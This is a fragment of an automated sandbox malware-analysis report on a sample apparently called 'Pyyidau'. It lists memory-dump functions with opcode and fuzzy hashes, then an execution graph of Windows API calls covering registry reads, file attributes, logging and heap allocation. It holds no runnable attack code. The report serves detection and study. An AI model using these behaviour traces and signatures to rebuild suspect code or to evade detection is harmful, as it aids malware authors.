                                                                                                                        Function 0B8DA5F8 Relevance: .0, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 89fc267f3c812fe2297d7df17b983024def80ec0d009ea7b8d5d7c132a6931d4
                                                                                                                        • Instruction ID: cd57fdd182571d3c7e181e95366d9438a6935bd483b37ea2d7da05cea3d758e6
                                                                                                                        • Opcode Fuzzy Hash: 89fc267f3c812fe2297d7df17b983024def80ec0d009ea7b8d5d7c132a6931d4
                                                                                                                        • Instruction Fuzzy Hash: 7CE0C274E04208EFCB84DFA8E4416ACBBF4EB48204F20C4AA9818E3350DA35AA42CF40
                                                                                                                        Function 0B8DF530 Relevance: .0, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cb7a71c1abace64482cf180804914d0ea2095dc8dfe41bf70dd52f94bae52e36
                                                                                                                        • Instruction ID: 5f34afc36f0c19742773538ddafe2fe6eaffc5d7fa87701b7cbd0ea820b02dc8
                                                                                                                        • Opcode Fuzzy Hash: cb7a71c1abace64482cf180804914d0ea2095dc8dfe41bf70dd52f94bae52e36
                                                                                                                        • Instruction Fuzzy Hash: 77E04F7090920CEBCB80EFBCD50929DBBF5AB49305F1080AA990DE3390DB345E54DB92
                                                                                                                        Function 043EB190 Relevance: .0, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: adf3f7378834847d4aceef55ad65c49aa933cae447c204c8cb5a42b65e8e9db0
                                                                                                                        • Instruction ID: 355774c9b2587e2398d503a4bdabad4423988d1e311789c63b34ff4d8a576f04
                                                                                                                        • Opcode Fuzzy Hash: adf3f7378834847d4aceef55ad65c49aa933cae447c204c8cb5a42b65e8e9db0
                                                                                                                        • Instruction Fuzzy Hash: 7DE0C2753001149FC744EBBCE4488063BEAFB8CA603608069E409C33A4DE30EC01CB90
                                                                                                                        Function 0B8D8E18 Relevance: .0, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3995846b64cab690bf8f68dcaf00e72fde0c3d22d4a92382b24aa5cc63d6007e
                                                                                                                        • Instruction ID: 74b1d97af88b3446d79d04b214852c1a06f6cb95dc8e66458940e158dead30b1
                                                                                                                        • Opcode Fuzzy Hash: 3995846b64cab690bf8f68dcaf00e72fde0c3d22d4a92382b24aa5cc63d6007e
                                                                                                                        • Instruction Fuzzy Hash: 8AE01A34D08108ABC754DF98D4415ACFBB8AB49205F10C0EED85893391CA356E42DF80
                                                                                                                        Function 0B8DB908 Relevance: .0, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ffde05eb2e65ae45785a7e2011983e05b3bcad743204540c7d538318afec222a
                                                                                                                        • Instruction ID: 73341a7fc175517b30a988137c2e8b3137108ec2d38027d9b6a70feaa4f999c0
                                                                                                                        • Opcode Fuzzy Hash: ffde05eb2e65ae45785a7e2011983e05b3bcad743204540c7d538318afec222a
                                                                                                                        • Instruction Fuzzy Hash: C1E0127594110CEBC700EFF9D90079E77A9DF45201F4044AAE504972A1EE355B409BA6
                                                                                                                        Function 0B8DE8D0 Relevance: .0, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 60c7f864d3cf605fb3968965bf540688145dccf316de45c7863abe54c1f7122c
                                                                                                                        • Instruction ID: 623b30200d03d24551d557faa3725ca25098a96531847fdd41aa4d613be3aa6e
                                                                                                                        • Opcode Fuzzy Hash: 60c7f864d3cf605fb3968965bf540688145dccf316de45c7863abe54c1f7122c
                                                                                                                        • Instruction Fuzzy Hash: 02E01274A09108DBCB04DFE4E9415ACFBB5EB45715F10D1DDE80867391CB326E46DB81
                                                                                                                        Function 043ECE90 Relevance: .0, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 506f35433ec84828c33e5604920f28349a1d3aaea40dc6048bfc4041e1c3bf50
                                                                                                                        • Instruction ID: a23b5797406e300f8aebbc2f48c87880e08839b8df01f57375b7ed4040acee03
                                                                                                                        • Opcode Fuzzy Hash: 506f35433ec84828c33e5604920f28349a1d3aaea40dc6048bfc4041e1c3bf50
                                                                                                                        • Instruction Fuzzy Hash: 48D0E279D16228CACB10CBA5C9407DDFBB4AB0C201F016166D01AA6240E234AA009A40
                                                                                                                        Function 043EEAF8 Relevance: .0, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dca1b524463ef0ddd10aa4c155c486fc43cdfd0c17a89ac40731f5c890204482
                                                                                                                        • Instruction ID: 7c4621f8694f3b2eb7170f342dc0fe5b18c62c79ab689a4962c3975a763de559
                                                                                                                        • Opcode Fuzzy Hash: dca1b524463ef0ddd10aa4c155c486fc43cdfd0c17a89ac40731f5c890204482
                                                                                                                        • Instruction Fuzzy Hash: D8D05B7090510CEFCB40EFB4DA0195EB7B5EF44204B5045E9D40CE7740EB315F049B80
                                                                                                                        Function 043ECCDE Relevance: .0, Instructions: 14COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9542cba5878cb27355a15633f7013593f732eccbc8543e1c606bdd537dde7e08
                                                                                                                        • Instruction ID: 3b2dfbbea3215d4c58c26c29bdd51fe244911f8b5798682e597c4f78e36aa9b0
                                                                                                                        • Opcode Fuzzy Hash: 9542cba5878cb27355a15633f7013593f732eccbc8543e1c606bdd537dde7e08
                                                                                                                        • Instruction Fuzzy Hash: EFE08C3180A026CFCB208F09C8087BAB3A1EB00320FA660E5D4186B694CB342C069F40
                                                                                                                        Function 043E9530 Relevance: .0, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bc25dd3a8ac33fb824dbb3ac5253bc61960a529fa1e7b29c62bcb7bc789a5096
                                                                                                                        • Instruction ID: 2c4b106198b0c5b7bb5cac1f2a2a6f0399f783d663d49babdd644528bf51c25e
                                                                                                                        • Opcode Fuzzy Hash: bc25dd3a8ac33fb824dbb3ac5253bc61960a529fa1e7b29c62bcb7bc789a5096
                                                                                                                        • Instruction Fuzzy Hash: 7CC08CC99402402ECF043670253C87C1A098B952403A84C86E503E75E0C9588A80D758
                                                                                                                        Function 0B8DECB0 Relevance: .0, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5425f284f32fca023a8d00f34d22d5c20e0fe1ab597b58b75c55ca5182d12787
                                                                                                                        • Instruction ID: bf7dd4a639fc02c82642a6c70694dbdf3ca11738429a7aa892bc7b8e9016dcc8
                                                                                                                        • Opcode Fuzzy Hash: 5425f284f32fca023a8d00f34d22d5c20e0fe1ab597b58b75c55ca5182d12787
                                                                                                                        • Instruction Fuzzy Hash: 5FC02B3005F60C87C65476A5B00D37073AC6B0B307FC0A401A00C462F10F641440CB91
                                                                                                                        Function 043EB5C2 Relevance: .0, Instructions: 11COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1c8b2c27763060b6cc7ed0a75d88ac9024403faba6686947d014eda4862604e6
                                                                                                                        • Instruction ID: ab63a182e6316f06e78069669931148d5caa2eb550fee30f3918d85c06eca0b2
                                                                                                                        • Opcode Fuzzy Hash: 1c8b2c27763060b6cc7ed0a75d88ac9024403faba6686947d014eda4862604e6
                                                                                                                        • Instruction Fuzzy Hash: 6DD09274E012198FDB40DFA5CA50BAEB7B1BF88300F604119C406B7285DB353D06CF14
                                                                                                                        Function 043E9F40 Relevance: .0, Instructions: 8COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e45599dba176cbc19a9ca855f663cb73ee7f28b076dd86d91c46fb39c3bd6fe9
                                                                                                                        • Instruction ID: c9adf12a69744f4680bfae809ad1dfa511a0a61b510a6c4b81c605c5941ae289
                                                                                                                        • Opcode Fuzzy Hash: e45599dba176cbc19a9ca855f663cb73ee7f28b076dd86d91c46fb39c3bd6fe9
                                                                                                                        • Instruction Fuzzy Hash: A9B0922840F3D05FDF22A7302E7A4CC3F24492366430920D7E1A28A1A3C2580AA6DB69
                                                                                                                        Function 043ECEC3 Relevance: .0, Instructions: 5COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1825086989.00000000043E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_43e0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2b8c626dfa1b457915cc976e77a2b524dac942561a4b288a28ea74dc20189759
                                                                                                                        • Instruction ID: 721102fe0685abf4e6926f70f5c77ce41059ddfc6f3d1168260fdb957d6523d3
                                                                                                                        • Opcode Fuzzy Hash: 2b8c626dfa1b457915cc976e77a2b524dac942561a4b288a28ea74dc20189759
                                                                                                                        • Instruction Fuzzy Hash: 3FB09274D09624CBCB208F95C50435CFAB0AB48200F0191EBC80DB3380E3381D809F10

                                                                                                                        Non-executed Functions

                                                                                                                        Function 0B8C0007 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 0-1684325040
                                                                                                                        • Opcode ID: 850025b9216f8ace76aa97fcd44bd47851aadaefb32de5cc0de099c915de5f6b
                                                                                                                        • Instruction ID: 6bced3d23daad75ceb5c2f38fc5211239262024a6f1c6a69f88dac363970ee5e
                                                                                                                        • Opcode Fuzzy Hash: 850025b9216f8ace76aa97fcd44bd47851aadaefb32de5cc0de099c915de5f6b
                                                                                                                        • Instruction Fuzzy Hash: 02311071D097958FDB2ACF268C5468ABFF2AF8A300F05C0EBD4489B166DB344985CF12
                                                                                                                        Function 0B8C0040 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1881900138.000000000B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_b8c0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 0-1684325040
                                                                                                                        • Opcode ID: 090ee8352bdc16b69ffd1121b1ceb5cdb39bbd23a481ddf7e1cf30ae98b62ff2
                                                                                                                        • Instruction ID: db1b5be01ddf779902def469d8397f6726e129c9ad145d2a440ec74e498c8a42
                                                                                                                        • Opcode Fuzzy Hash: 090ee8352bdc16b69ffd1121b1ceb5cdb39bbd23a481ddf7e1cf30ae98b62ff2
                                                                                                                        • Instruction Fuzzy Hash: D831CBB0D046298FDB69CF2AC95479AFAF6BF89304F04C0EA940DA7254EB345A858F01
                                                                                                                        Function 072A1AAD Relevance: 6.4, Strings: 5, Instructions: 119COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1832849722.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_72a0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$Te^q$Te^q$Te^q
                                                                                                                        • API String ID: 0-3563833378
                                                                                                                        • Opcode ID: ade9da6670d2330856bd9d87e87d5e7cb8e322aa2d20957be3445d31a8317b94
                                                                                                                        • Instruction ID: f4c8e0635484316ff59dcd0c97a52268a9445cf86f02afe0ae49f527776075e0
                                                                                                                        • Opcode Fuzzy Hash: ade9da6670d2330856bd9d87e87d5e7cb8e322aa2d20957be3445d31a8317b94
                                                                                                                        • Instruction Fuzzy Hash: E6312AF176030BAFCB155A78995427AB7B3AF81320F14486BD112CF296FE75C466C362
                                                                                                                        Function 072A0978 Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.1832849722.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_72a0000_Pyyidau.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                        • API String ID: 0-2049395529
                                                                                                                        • Opcode ID: 20d28cc457a652b6750bdef6aad42bd4e108a901babb9e9a0e8cad196e69247b
                                                                                                                        • Instruction ID: 992e47c5579016bb9c7c322deb41bb5cb869f6c8acb2d8caa5a15bbbf5dd52fa
                                                                                                                        • Opcode Fuzzy Hash: 20d28cc457a652b6750bdef6aad42bd4e108a901babb9e9a0e8cad196e69247b
                                                                                                                        • Instruction Fuzzy Hash: D901D46062E3C75FD33B063818209656FB24FC3B4072A04D7C081DF696DD659D4A8366

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:1.4%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:32%
                                                                                                                        Total number of Nodes:1004
                                                                                                                        Total number of Limit Nodes:27
                                                                                                                        execution_graph 54949 b2e492 54950 b2e49b _wcschr 54949->54950 54957 b26080 GetShortPathNameW 54950->54957 54952 b2e581 54986 b2f030 GetLocalTime wsprintfW 54952->54986 54954 b2e587 54955 b2f030 208 API calls 54954->54955 54956 b2e598 54955->54956 54958 b260af GetLastError 54957->54958 54959 b260b7 std::locale::facet::_Facet_Register 54957->54959 54958->54959 54960 b260f7 wsprintfW MessageBoxW 54959->54960 54961 b2613c 54959->54961 55070 b382b3 54960->55070 55051 b25690 54961->55051 54964 b26138 54964->54952 54965 b2614b 54966 b2f030 208 API calls 54965->54966 54967 b26163 54966->54967 54968 b2f030 208 API calls 54967->54968 54969 b26172 std::locale::facet::_Facet_Register 54968->54969 54970 b2f030 208 API calls 54969->54970 54974 b261ca 54969->54974 54970->54974 54971 b2622f SetCurrentDirectoryW 54972 b2623c 54971->54972 54975 b26246 54971->54975 55063 b2f5b0 54972->55063 54974->54971 54974->54974 54975->54975 55067 b3c0c4 54975->55067 54977 b382b3 _wcsupr_s_l_stat 5 API calls 54978 b26399 54977->54978 54978->54952 54980 b3c0c4 68 API calls 54982 b262c1 54980->54982 54981 b262c8 54981->54977 54982->54981 54983 b3c0c4 68 API calls 54982->54983 54984 b2631b 54983->54984 54984->54981 54985 b3c0c4 68 API calls 54984->54985 54985->54981 54987 b2f0b1 wvsprintfW wsprintfW 54986->54987 54988 b2f199 54986->54988 54987->54988 54989 b2f0e1 54987->54989 54990 b2f1a1 InitializeCriticalSection 54988->54990 54991 b2f1b6 EnterCriticalSection 54988->54991 54989->54988 54992 b2f0ed 54989->54992 54990->54991 54993 b2f1e9 GetCurrentDirectoryW 54991->54993 55003 b2f1ca std::locale::facet::_Facet_Register 54991->55003 54996 b2f101 54992->54996 55105 b37ca4 54992->55105 54993->55003 54995 b2f599 54997 b382b3 _wcsupr_s_l_stat 5 API calls 54995->54997 54996->54995 54996->54996 54999 b2f16e 54996->54999 54998 b2f5a6 54997->54998 54998->54954 55004 b382b3 _wcsupr_s_l_stat 5 API calls 54999->55004 55000 b2f423 LeaveCriticalSection 55001 b382b3 _wcsupr_s_l_stat 5 API calls 55000->55001 55002 b2f43b 55001->55002 55002->54954 55003->55000 55005 b2f288 55003->55005 55006 b2f43f 55003->55006 55007 b2f195 55004->55007 55005->55000 55122 b39583 55005->55122 55008 b39583 std::locale::facet::_Facet_Register 136 API calls 55006->55008 55007->54954 55011 b2f45f 55008->55011 55011->55000 55013 b2f468 55011->55013 55012 b2f335 GetKeyState 55015 b2f344 GetKeyState 55012->55015 55024 b2f34d 55012->55024 55132 b034a0 190 API calls std::locale::facet::_Facet_Register 55013->55132 55015->55024 55017 b2f2b9 55126 ae19e0 66 API calls 55017->55126 55018 b2f473 55019 b2f4ac 55018->55019 55133 b373d1 99 API calls 7 library calls 55018->55133 55022 b2f4fe ctype 55019->55022 55134 b19130 189 API calls 55019->55134 55137 b19130 189 API calls 55022->55137 55023 b2f2cd 55043 b2f315 55023->55043 55127 b3a397 78 API calls 2 library calls 55023->55127 55024->55000 55025 b2f395 wsprintfW RegOpenKeyExW 55024->55025 55029 b2f40c RegCloseKey 55024->55029 55131 b383d7 67 API calls __fassign 55024->55131 55025->55024 55028 b2f3d1 RegQueryValueExW 55025->55028 55028->55024 55028->55029 55029->55024 55030 b2f52a 55138 b3762e 99 API calls 4 library calls 55030->55138 55031 b2f32a 55130 b01dc0 187 API calls 2 library calls 55031->55130 55032 b2f4ce 55135 b3762e 99 API calls 4 library calls 55032->55135 55037 b2f2e4 55037->55043 55128 b383d7 67 API calls __fassign 55037->55128 55040 b2f548 55044 b2f561 LeaveCriticalSection 55040->55044 55045 b2f554 OutputDebugStringW 55040->55045 55041 b2f4f3 55136 b379a7 66 API calls 2 library calls 55041->55136 55043->55031 55129 b38c09 102 API calls 4 library calls 55043->55129 55047 b2f578 ctype 55044->55047 55045->55044 55048 b2f58b 55047->55048 55139 b38c09 102 API calls 4 library calls 55047->55139 55140 b01dc0 187 API calls 2 library calls 55048->55140 55052 b2569d __write_nolock 55051->55052 55053 b256da GetModuleHandleW GetProcAddress 55052->55053 55061 b25843 55052->55061 55054 b256f5 GetLongPathNameW 55053->55054 55059 b2570e std::locale::facet::_Facet_Register 55053->55059 55056 b382b3 _wcsupr_s_l_stat 5 API calls 55054->55056 55055 b382b3 _wcsupr_s_l_stat 5 API calls 55057 b258a9 55055->55057 55058 b2570a 55056->55058 55057->54965 55058->54965 55059->55061 55062 b2574b std::locale::facet::_Facet_Register 55059->55062 55061->55055 55061->55061 55062->55061 55062->55062 55078 b255d0 7 API calls 3 library calls 55062->55078 55064 b2f5c0 55063->55064 55064->55064 55065 b2f030 208 API calls 55064->55065 55066 b2f5d6 55065->55066 55066->54975 55079 b3c045 55067->55079 55071 b382bb 55070->55071 55072 b382bd IsDebuggerPresent 55070->55072 55071->54964 55104 b4a7a0 55072->55104 55075 b3fa3d SetUnhandledExceptionFilter UnhandledExceptionFilter 55076 b3fa62 GetCurrentProcess TerminateProcess 55075->55076 55077 b3fa5a __call_reportfault 55075->55077 55076->54964 55077->55076 55078->55062 55080 b3c052 55079->55080 55081 b3c06c 55079->55081 55097 b3cfda 66 API calls __getptd_noexit 55080->55097 55081->55080 55083 b3c075 GetFileAttributesW 55081->55083 55085 b3c083 GetLastError 55083->55085 55086 b3c099 55083->55086 55084 b3c057 55098 b3cfc7 66 API calls __getptd_noexit 55084->55098 55100 b3cfed 66 API calls 2 library calls 55085->55100 55090 b2628e 55086->55090 55102 b3cfda 66 API calls __getptd_noexit 55086->55102 55089 b3c05e 55099 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55089->55099 55090->54980 55090->54981 55091 b3c08f 55101 b3cfc7 66 API calls __getptd_noexit 55091->55101 55095 b3c0ac 55103 b3cfc7 66 API calls __getptd_noexit 55095->55103 55097->55084 55098->55089 55099->55090 55100->55091 55101->55090 55102->55095 55103->55091 55104->55075 55106 b37d21 55105->55106 55110 b37cb2 55105->55110 55149 b3f463 DecodePointer 55106->55149 55108 b37d27 55150 b3cfc7 66 API calls __getptd_noexit 55108->55150 55109 b37cbd 55109->55110 55141 b3f3ce 66 API calls __NMSG_WRITE 55109->55141 55142 b3f21f 66 API calls 7 library calls 55109->55142 55143 b3c94c 55109->55143 55110->55109 55113 b37ce0 RtlAllocateHeap 55110->55113 55116 b37d0d 55110->55116 55120 b37d0b 55110->55120 55146 b3f463 DecodePointer 55110->55146 55113->55110 55114 b37d19 55113->55114 55114->54996 55147 b3cfc7 66 API calls __getptd_noexit 55116->55147 55148 b3cfc7 66 API calls __getptd_noexit 55120->55148 55155 b394c5 55122->55155 55124 b2f2a5 55124->55012 55125 ae1f50 190 API calls 55124->55125 55125->55017 55126->55023 55127->55037 55128->55043 55129->55031 55130->55012 55131->55024 55132->55018 55133->55019 55134->55032 55135->55041 55136->55022 55137->55030 55138->55040 55139->55048 55140->54995 55141->55109 55142->55109 55151 b3c921 GetModuleHandleW 55143->55151 55146->55110 55147->55120 55148->55114 55149->55108 55150->55114 55152 b3c935 GetProcAddress 55151->55152 55153 b3c94a ExitProcess 55151->55153 55152->55153 55154 b3c945 55152->55154 55154->55153 55157 b394d1 __commit 55155->55157 55156 b394e4 55212 b3cfc7 66 API calls __getptd_noexit 55156->55212 55157->55156 55159 b39512 55157->55159 55174 b443a1 55159->55174 55160 b394e9 55213 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55160->55213 55163 b39517 55164 b3952b 55163->55164 55165 b3951e 55163->55165 55167 b39553 55164->55167 55168 b39533 55164->55168 55214 b3cfc7 66 API calls __getptd_noexit 55165->55214 55192 b440e8 55167->55192 55215 b3cfc7 66 API calls __getptd_noexit 55168->55215 55172 b394f4 __commit @_EH4_CallFilterFunc@8 55172->55124 55175 b443ad __commit 55174->55175 55217 b492ea 55175->55217 55177 b443bb 55178 b44437 55177->55178 55189 b44430 55177->55189 55227 b49228 55177->55227 55255 b3d816 67 API calls __lock 55177->55255 55256 b3d884 LeaveCriticalSection LeaveCriticalSection __wdupenv_s 55177->55256 55257 b45ace 66 API calls _malloc 55178->55257 55181 b4443e 55182 b4444c InitializeCriticalSectionAndSpinCount 55181->55182 55181->55189 55184 b4446c 55182->55184 55185 b4447f EnterCriticalSection 55182->55185 55183 b444c0 __commit 55183->55163 55258 b379a7 66 API calls 2 library calls 55184->55258 55185->55189 55224 b444cb 55189->55224 55190 b44474 55190->55189 55194 b4410a 55192->55194 55193 b4413c __wopenfile 55200 b4434a 55193->55200 55211 b442f1 55193->55211 55274 b3a397 78 API calls 2 library calls 55193->55274 55194->55193 55195 b44125 55194->55195 55272 b3cfc7 66 API calls __getptd_noexit 55195->55272 55197 b4412a 55273 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55197->55273 55199 b4435c 55269 b56293 55199->55269 55277 b3cfc7 66 API calls __getptd_noexit 55200->55277 55203 b4434f 55278 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55203->55278 55204 b3955e 55216 b39579 LeaveCriticalSection LeaveCriticalSection _fputws 55204->55216 55207 b442ea 55207->55211 55275 b3a397 78 API calls 2 library calls 55207->55275 55209 b44309 55209->55211 55276 b3a397 78 API calls 2 library calls 55209->55276 55211->55199 55211->55200 55212->55160 55213->55172 55214->55172 55215->55172 55216->55172 55218 b49312 EnterCriticalSection 55217->55218 55219 b492ff 55217->55219 55218->55177 55220 b49228 __mtinitlocknum 65 API calls 55219->55220 55221 b49305 55220->55221 55221->55218 55259 b3cc6b 66 API calls 3 library calls 55221->55259 55260 b491f9 LeaveCriticalSection 55224->55260 55226 b444d2 55226->55183 55228 b49234 __commit 55227->55228 55229 b49244 55228->55229 55230 b4925c 55228->55230 55261 b3f3ce 66 API calls __NMSG_WRITE 55229->55261 55231 b4925a 55230->55231 55240 b4926a __commit 55230->55240 55231->55230 55263 b45ace 66 API calls _malloc 55231->55263 55234 b49249 55262 b3f21f 66 API calls 7 library calls 55234->55262 55236 b49275 55238 b4927c 55236->55238 55239 b4928b 55236->55239 55237 b49250 55241 b3c94c _fast_error_exit 3 API calls 55237->55241 55264 b3cfc7 66 API calls __getptd_noexit 55238->55264 55243 b492ea __lock 65 API calls 55239->55243 55240->55177 55241->55231 55245 b49292 55243->55245 55244 b49281 55244->55240 55246 b492c5 55245->55246 55247 b4929a InitializeCriticalSectionAndSpinCount 